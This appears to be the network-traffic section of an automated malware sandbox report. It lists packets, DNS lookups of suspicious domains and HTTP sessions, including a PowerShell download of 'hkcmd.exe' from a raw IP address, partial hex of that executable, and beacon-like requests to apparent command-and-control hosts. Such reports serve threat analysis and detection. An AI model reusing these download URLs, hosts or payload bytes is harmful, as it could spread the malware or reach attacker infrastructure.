                                                                                                            Apr 14, 2025 23:19:27.882750034 CEST804969613.248.169.48192.168.2.7
                                                                                                            Apr 14, 2025 23:19:27.882802010 CEST4969680192.168.2.713.248.169.48
                                                                                                            Apr 14, 2025 23:19:29.272644997 CEST4969680192.168.2.713.248.169.48
                                                                                                            Apr 14, 2025 23:19:30.290451050 CEST4969780192.168.2.713.248.169.48
                                                                                                            Apr 14, 2025 23:19:30.413223028 CEST804969713.248.169.48192.168.2.7
                                                                                                            Apr 14, 2025 23:19:30.413438082 CEST4969780192.168.2.713.248.169.48
                                                                                                            Apr 14, 2025 23:19:30.426201105 CEST4969780192.168.2.713.248.169.48
                                                                                                            Apr 14, 2025 23:19:30.552092075 CEST804969713.248.169.48192.168.2.7
                                                                                                            Apr 14, 2025 23:19:30.552134991 CEST804969713.248.169.48192.168.2.7
                                                                                                            Apr 14, 2025 23:19:30.552431107 CEST4969780192.168.2.713.248.169.48
                                                                                                            Apr 14, 2025 23:19:30.554573059 CEST4969780192.168.2.713.248.169.48
                                                                                                            Apr 14, 2025 23:19:30.675915003 CEST804969713.248.169.48192.168.2.7
                                                                                                            Apr 14, 2025 23:19:35.764663935 CEST4969880192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:35.932238102 CEST8049698209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:35.932360888 CEST4969880192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:35.946878910 CEST4969880192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:36.114615917 CEST8049698209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:36.119762897 CEST8049698209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:36.119779110 CEST8049698209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:36.119829893 CEST4969880192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:37.460089922 CEST4969880192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:38.478214979 CEST4969980192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:38.633147001 CEST8049699209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:38.633327961 CEST4969980192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:38.645226002 CEST4969980192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:38.800313950 CEST8049699209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:38.805211067 CEST8049699209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:38.805250883 CEST8049699209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:38.805310011 CEST4969980192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:40.147841930 CEST4969980192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:41.167335033 CEST4970080192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:41.323666096 CEST8049700209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:41.323769093 CEST4970080192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:41.340924025 CEST4970080192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:41.495978117 CEST8049700209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:41.501197100 CEST8049700209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:41.501238108 CEST8049700209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:41.501308918 CEST4970080192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:42.850713015 CEST4970080192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:43.869204998 CEST4970180192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:44.035953999 CEST8049701209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:44.036094904 CEST4970180192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:44.045516014 CEST4970180192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:44.212023020 CEST8049701209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:44.216989040 CEST8049701209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:44.217031956 CEST8049701209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:44.217178106 CEST4970180192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:44.221117020 CEST4970180192.168.2.7209.74.80.150
                                                                                                            Apr 14, 2025 23:19:44.387650013 CEST8049701209.74.80.150192.168.2.7
                                                                                                            Apr 14, 2025 23:19:50.032722950 CEST4970280192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:50.335012913 CEST804970238.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:50.335129023 CEST4970280192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:50.360629082 CEST4970280192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:50.661901951 CEST804970238.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:50.740915060 CEST804970238.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:50.740946054 CEST804970238.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:50.741048098 CEST4970280192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:51.866348028 CEST4970280192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:52.885499954 CEST4970380192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:53.178808928 CEST804970338.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:53.178905964 CEST4970380192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:53.196038961 CEST4970380192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:53.489461899 CEST804970338.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:53.578737974 CEST804970338.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:53.578779936 CEST804970338.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:53.579116106 CEST4970380192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:54.710208893 CEST4970380192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:55.729090929 CEST4970480192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:56.016336918 CEST804970438.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:56.020301104 CEST4970480192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:56.034625053 CEST4970480192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:56.321485996 CEST804970438.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:56.410912037 CEST804970438.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:56.410947084 CEST804970438.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:56.411036968 CEST4970480192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:57.538295984 CEST4970480192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:58.557512999 CEST4970580192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:58.857363939 CEST804970538.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:58.857455015 CEST4970580192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:58.865468025 CEST4970580192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:59.165220022 CEST804970538.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:59.258589983 CEST804970538.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:59.258614063 CEST804970538.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:19:59.258737087 CEST4970580192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:59.262105942 CEST4970580192.168.2.738.181.35.142
                                                                                                            Apr 14, 2025 23:19:59.561836004 CEST804970538.181.35.142192.168.2.7
                                                                                                            Apr 14, 2025 23:20:12.614464045 CEST4970680192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:12.735979080 CEST8049706104.21.85.156192.168.2.7
                                                                                                            Apr 14, 2025 23:20:12.736104012 CEST4970680192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:12.751338959 CEST4970680192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:12.872786999 CEST8049706104.21.85.156192.168.2.7
                                                                                                            Apr 14, 2025 23:20:13.037368059 CEST8049706104.21.85.156192.168.2.7
                                                                                                            Apr 14, 2025 23:20:13.037657022 CEST8049706104.21.85.156192.168.2.7
                                                                                                            Apr 14, 2025 23:20:13.037801027 CEST8049706104.21.85.156192.168.2.7
                                                                                                            Apr 14, 2025 23:20:13.037817955 CEST4970680192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:13.037874937 CEST4970680192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:15.225770950 CEST4970680192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:16.243961096 CEST4970780192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:16.365339994 CEST8049707104.21.85.156192.168.2.7
                                                                                                            Apr 14, 2025 23:20:16.365439892 CEST4970780192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:16.379368067 CEST4970780192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:16.501059055 CEST8049707104.21.85.156192.168.2.7
                                                                                                            Apr 14, 2025 23:20:16.665311098 CEST8049707104.21.85.156192.168.2.7
                                                                                                            Apr 14, 2025 23:20:16.665329933 CEST8049707104.21.85.156192.168.2.7
                                                                                                            Apr 14, 2025 23:20:16.665369034 CEST4970780192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:16.666215897 CEST8049707104.21.85.156192.168.2.7
                                                                                                            Apr 14, 2025 23:20:16.666260004 CEST4970780192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:17.882026911 CEST4970780192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:18.900594950 CEST4970880192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:19.022109985 CEST8049708104.21.85.156192.168.2.7
                                                                                                            Apr 14, 2025 23:20:19.022195101 CEST4970880192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:19.037919044 CEST4970880192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:19.159593105 CEST8049708104.21.85.156192.168.2.7
                                                                                                            Apr 14, 2025 23:20:19.338892937 CEST8049708104.21.85.156192.168.2.7
                                                                                                            Apr 14, 2025 23:20:19.338943958 CEST8049708104.21.85.156192.168.2.7
                                                                                                            Apr 14, 2025 23:20:19.339092970 CEST4970880192.168.2.7104.21.85.156
                                                                                                            Apr 14, 2025 23:20:19.339107037 CEST8049708104.21.85.156192.168.2.7
                                                                                                            Apr 14, 2025 23:20:19.339168072 CEST4970880192.168.2.7104.21.85.156

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Apr 14, 2025 23:18:56.145034075 CEST5835153192.168.2.71.1.1.1
                                                                                                            Apr 14, 2025 23:18:57.147731066 CEST5835153192.168.2.71.1.1.1
                                                                                                            Apr 14, 2025 23:18:57.901882887 CEST53583511.1.1.1192.168.2.7
                                                                                                            Apr 14, 2025 23:18:57.901906967 CEST53583511.1.1.1192.168.2.7
                                                                                                            Apr 14, 2025 23:19:13.637850046 CEST5115253192.168.2.71.1.1.1
                                                                                                            Apr 14, 2025 23:19:13.761408091 CEST53511521.1.1.1192.168.2.7
                                                                                                            Apr 14, 2025 23:19:21.823750019 CEST6371853192.168.2.71.1.1.1
                                                                                                            Apr 14, 2025 23:19:22.267432928 CEST53637181.1.1.1192.168.2.7
                                                                                                            Apr 14, 2025 23:19:35.572511911 CEST5864053192.168.2.71.1.1.1
                                                                                                            Apr 14, 2025 23:19:35.762525082 CEST53586401.1.1.1192.168.2.7
                                                                                                            Apr 14, 2025 23:19:49.229624033 CEST6377553192.168.2.71.1.1.1
                                                                                                            Apr 14, 2025 23:19:50.024385929 CEST53637751.1.1.1192.168.2.7
                                                                                                            Apr 14, 2025 23:20:04.275871038 CEST5685453192.168.2.71.1.1.1
                                                                                                            Apr 14, 2025 23:20:04.402450085 CEST53568541.1.1.1192.168.2.7
                                                                                                            Apr 14, 2025 23:20:12.466095924 CEST6304853192.168.2.71.1.1.1
                                                                                                            Apr 14, 2025 23:20:12.611790895 CEST53630481.1.1.1192.168.2.7

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Apr 14, 2025 23:18:56.145034075 CEST192.168.2.71.1.1.10x927eStandard query (0)www.72422.pinkA (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:18:57.147731066 CEST192.168.2.71.1.1.10x927eStandard query (0)www.72422.pinkA (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:19:13.637850046 CEST192.168.2.71.1.1.10x448aStandard query (0)www.credit-agricole.picsA (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:19:21.823750019 CEST192.168.2.71.1.1.10xdefeStandard query (0)www.wavekeith.mediaA (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:19:35.572511911 CEST192.168.2.71.1.1.10x5584Standard query (0)www.lifway.lifeA (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:19:49.229624033 CEST192.168.2.71.1.1.10x64d1Standard query (0)www.zthzzyg.topA (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:20:04.275871038 CEST192.168.2.71.1.1.10x24e2Standard query (0)www.rvtapp.comA (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:20:12.466095924 CEST192.168.2.71.1.1.10x4e30Standard query (0)www.shangaccurate.shopA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Apr 14, 2025 23:18:57.901882887 CEST1.1.1.1192.168.2.70x927eNo error (0)www.72422.pink72422.pink.lsyumingzong.buyusdt.meCNAME (Canonical name)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:18:57.901882887 CEST1.1.1.1192.168.2.70x927eNo error (0)72422.pink.lsyumingzong.buyusdt.melsyumingzong.buyusdt.meCNAME (Canonical name)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:18:57.901882887 CEST1.1.1.1192.168.2.70x927eNo error (0)lsyumingzong.buyusdt.mex112.jieruitech.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:18:57.901882887 CEST1.1.1.1192.168.2.70x927eNo error (0)x112.jieruitech.info192.197.113.156A (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:18:57.901906967 CEST1.1.1.1192.168.2.70x927eNo error (0)www.72422.pink72422.pink.lsyumingzong.buyusdt.meCNAME (Canonical name)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:18:57.901906967 CEST1.1.1.1192.168.2.70x927eNo error (0)72422.pink.lsyumingzong.buyusdt.melsyumingzong.buyusdt.meCNAME (Canonical name)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:18:57.901906967 CEST1.1.1.1192.168.2.70x927eNo error (0)lsyumingzong.buyusdt.mex112.jieruitech.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:18:57.901906967 CEST1.1.1.1192.168.2.70x927eNo error (0)x112.jieruitech.info192.197.113.156A (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:19:13.761408091 CEST1.1.1.1192.168.2.70x448aName error (3)www.credit-agricole.picsnonenoneA (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:19:22.267432928 CEST1.1.1.1192.168.2.70xdefeNo error (0)www.wavekeith.media13.248.169.48A (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:19:22.267432928 CEST1.1.1.1192.168.2.70xdefeNo error (0)www.wavekeith.media76.223.54.146A (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:19:35.762525082 CEST1.1.1.1192.168.2.70x5584No error (0)www.lifway.life209.74.80.150A (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:19:50.024385929 CEST1.1.1.1192.168.2.70x64d1No error (0)www.zthzzyg.top38.181.35.142A (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:20:04.402450085 CEST1.1.1.1192.168.2.70x24e2Name error (3)www.rvtapp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:20:12.611790895 CEST1.1.1.1192.168.2.70x4e30No error (0)www.shangaccurate.shop104.21.85.156A (IP address)IN (0x0001)false
                                                                                                            Apr 14, 2025 23:20:12.611790895 CEST1.1.1.1192.168.2.70x4e30No error (0)www.shangaccurate.shop172.67.207.82A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • 192.3.26.143
                                                                                                            • www.72422.pink
                                                                                                            • www.wavekeith.media
                                                                                                            • www.lifway.life
                                                                                                            • www.zthzzyg.top
                                                                                                            • www.shangaccurate.shop

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.749681192.3.26.143806600C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:18:14.454242945 CEST285OUTGET /440/hkcmd.exe HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                            Host: 192.3.26.143
                                                                                                            Connection: Keep-Alive
                                                                                                            Apr 14, 2025 23:18:14.599524021 CEST1358INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 14 Apr 2025 21:18:14 GMT
                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                            Last-Modified: Wed, 09 Apr 2025 09:49:32 GMT
                                                                                                            ETag: "1a0600-6325562da41e3"
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 1705472
                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/x-msdownload
                                                                                                            Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 08 07 00 00 fa 12 00 00 00 00 00 2c 18 07 00 00 10 00 00 00 20 07 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 [TRUNCATED]
                                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*, @@'`,Hd$.text `.itextt `.data` @.bss6@,.idata'(,@.tls4T.rdataT@@.relocHV@B.rsrc,`,@@@@ [TRUNCATED]
                                                                                                            Apr 14, 2025 23:18:14.599548101 CEST1358INData Raw: 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 2c 10 40 00 02 04 43 68 61 72 01 00 00 00 00 ff 00 00 00 90 40 10 40 00 01 07 49 6e 74 65 67 65 72 04 00 00 00 80 ff ff ff 7f 8b c0 58
                                                                                                            Data Ascii: Boolean@FalseTrue@,@Char@@IntegerX@Bytel@Word@Cardinal@string@WideString@@:@;@;@;@:@D8@`8
                                                                                                            Apr 14, 2025 23:18:14.599595070 CEST1358INData Raw: df 3c 11 8b 44 01 08 89 44 11 08 c3 8d 40 00 83 e9 04 01 c8 01 ca f7 d9 df 2c 01 df 3c 11 83 c1 08 78 f5 8b 04 01 89 04 11 c3 90 8b 48 04 8b 10 39 d1 89 11 89 4a 04 74 02 c3 90 81 e9 a8 47 47 00 89 ca c1 e9 03 0f b6 d6 b8 fe ff ff ff d3 c0 21 04
                                                                                                            Data Ascii: <DD@,<xH9JtGG!(GGu!$GG0!GGQ9PAtGG(GG$GG= GGuGG@u%H GG)JH
                                                                                                            Apr 14, 2025 23:18:14.599608898 CEST1358INData Raw: 1c 47 47 00 29 d8 a3 1c 47 47 00 89 0d 20 47 47 00 83 cb 02 89 58 fc eb 07 89 d8 e8 c9 fb ff ff c6 05 18 47 47 00 00 5b c3 56 57 8d 3c cd a8 47 47 00 8b 77 04 8b 46 04 89 47 04 89 38 39 c7 75 17 b8 fe ff ff ff d3 c0 21 04 95 28 47 47 00 75 07 0f
                                                                                                            Data Ascii: GG)GG GGXGG[VW<GGwFG89u!(GGu$GG#~)t3JHT0rd7KNGG_^[[1PSM@GuajBt,J@At1[KZJQS
                                                                                                            Apr 14, 2025 23:18:14.599621058 CEST1358INData Raw: 81 fd 2c 0a 04 00 76 03 89 50 f8 89 c5 89 c2 89 f0 89 f9 e8 2b f5 ff ff 89 f0 e8 3c fb ff ff 89 e8 5d 5f 5e 5b c3 90 f6 c1 03 0f 85 8b 00 00 00 83 e9 18 39 ca 76 44 89 c8 c1 e9 02 01 c1 31 c0 29 d1 83 d0 ff 21 c8 01 d0 89 c3 52 e8 a2 f7 ff ff 5a
                                                                                                            Data Ascii: ,vP+<]_^[9vD1)!RZt",vPN^[9rP^[ct,vX^[1^[@SX$,sx[
                                                                                                            Apr 14, 2025 23:18:14.599632025 CEST1358INData Raw: 8b 45 fc 8b 00 0f b7 40 02 83 e8 0d 3b 45 f4 7e 7b 8b 45 e8 83 c0 08 89 45 f0 c6 45 ef 01 8b 45 f4 85 c0 7e 2a 89 45 e0 80 7d ef 00 74 10 8b 45 f0 80 38 20 72 08 8b 45 f0 80 38 80 72 04 33 c0 eb 02 b0 01 88 45 ef ff 45 f0 ff 4d e0 75 d9 80 7d ef
                                                                                                            Data Ascii: E@;E~{EEEE~*E}tE8 rE8r3EEMu}t7E8u/(;<t<tC~<3DE@EE;E_^[]UP'PHuESVWH33@
                                                                                                            Apr 14, 2025 23:18:14.599643946 CEST1358INData Raw: 3b f8 76 0b 88 88 c0 45 47 00 40 3b f8 77 f5 8b c7 46 83 c2 20 83 fe 37 75 cc 5f 5e c3 8b c0 53 56 57 be 37 00 00 00 bb 58 20 47 00 83 3b 00 75 06 c7 03 30 15 40 00 8d 43 e4 89 43 f8 8d 43 e4 89 43 e8 33 c0 89 43 f0 c7 43 ec 01 00 00 00 0f b7 43
                                                                                                            Data Ascii: ;vEG@;wF 7u_^SVW7X G;u0@CCCC3CCC@%0=0s0vSf0fC{I00ss0s0v0 3fff%f0fC
                                                                                                            Apr 14, 2025 23:18:14.599654913 CEST1358INData Raw: 90 6a 00 d9 3c 24 58 c3 90 83 ec 08 df 3c 24 9b 58 5a c3 8b c0 83 ec 0c d9 3c 24 d9 7c 24 02 9b 66 81 4c 24 02 00 0f d9 6c 24 02 df 7c 24 04 9b d9 2c 24 59 58 5a c3 8b c0 83 3d 2c 40 47 00 00 74 06 ff 15 2c 40 47 00 b8 d2 00 00 00 e9 67 17 00 00
                                                                                                            Data Ascii: j<$X<$XZ<$|$fL$l$|$,$YXZ=,@Gt,@GgSHftIfs3=BGt=CGu3gt[@P@SV3Cf=r/f=w)f%f=uSuS$tP@Gtg
                                                                                                            Apr 14, 2025 23:18:14.599672079 CEST1358INData Raw: 86 87 48 40 00 b4 57 0a 3f 16 68 a9 4b 40 00 a1 ed cc ce 1b c2 d3 4e 40 a0 84 14 40 61 51 59 84 52 40 c8 a5 19 90 b9 a5 6f a5 55 40 3a 0f 20 f4 27 8f cb ce 58 40 84 09 94 f8 78 39 3f 81 5c 40 e5 0b b9 36 d7 07 8f a1 5f 40 df 4e 67 04 cd c9 f2 c9
                                                                                                            Data Ascii: H@W?hK@N@@aQYR@oU@: 'X@x9?\@6_@Ngb@"E@|oe@p+i@Ix@=AGA+BkU'9p|B0<RB~QC/j\&Cv)/&D'DDYdEJzEb>9
                                                                                                            Apr 14, 2025 23:18:14.599685907 CEST1358INData Raw: f3 ff ff c3 90 57 96 eb 02 8b 36 8b 7e d0 85 ff 74 0d 0f b7 0f 51 83 c7 02 f2 66 af 74 0a 59 8b 76 dc 85 f6 75 e3 5f c3 58 01 c0 29 c8 8b 74 47 fc 5f c3 8b c0 50 51 8b 00 e8 c7 ff ff ff 59 58 74 02 ff e6 59 e9 53 f5 ff ff c3 8b c0 56 89 d6 8b 00
                                                                                                            Data Ascii: W6~tQftYvu_X)tG_PQYXtYSV^uY;9t@u@@@Vf2ftfsPXXt^^aSVW11ptf>N8tfOu@u
                                                                                                            Apr 14, 2025 23:18:14.738709927 CEST1358INData Raw: ff ff 83 f8 00 59 5a 58 74 6d 31 db 64 8b 1b 53 50 52 51 8b 54 24 28 83 48 04 02 56 6a 00 50 68 ec 3f 40 00 52 ff 15 18 40 47 00 5b 8b 7c 24 28 e8 6e 28 00 00 ff b0 00 00 00 00 89 a0 00 00 00 00 8b 6f 08 c7 47 04 18 40 40 00 8b 44 24 08 e8 cb fc
                                                                                                            Data Ascii: YZXtm1dSPRQT$(HVjPh?@R@G[|$(n(oG@@D$cB(AtD$@S1VWUUh@@d3d#dPHSPRQ|$4'OoG@@'1


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.749692192.197.113.156806016C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:18:58.225759029 CEST466OUTGET /tbxt/?NN=3NLhkz&ix=Iqu27JV6RtB5rwbWGX5phE4n2DLT8oSC71HEWnCl1r6gTdDm+5MFdqapX6KFcoaemzdW+bJMUEQ6mPDpHKBT298xZqQgH4Lfi5qu+/ZqVZvF6XXxTTdWlrU0agt8zu0nuVHx3Ilwud1w HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Host: www.72422.pink
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                                                                                                            Apr 14, 2025 23:18:58.538793087 CEST146INHTTP/1.1 404 Not Found
                                                                                                            Server: openresty
                                                                                                            Date: Mon, 14 Apr 2025 21:18:58 GMT
                                                                                                            Content-Type: text/plain
                                                                                                            Content-Length: 0
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.74969413.248.169.48806016C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:19:22.411091089 CEST740OUTPOST /c6g4/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.wavekeith.media
                                                                                                            Content-Length: 215
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Origin: http://www.wavekeith.media
                                                                                                            Referer: http://www.wavekeith.media/c6g4/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
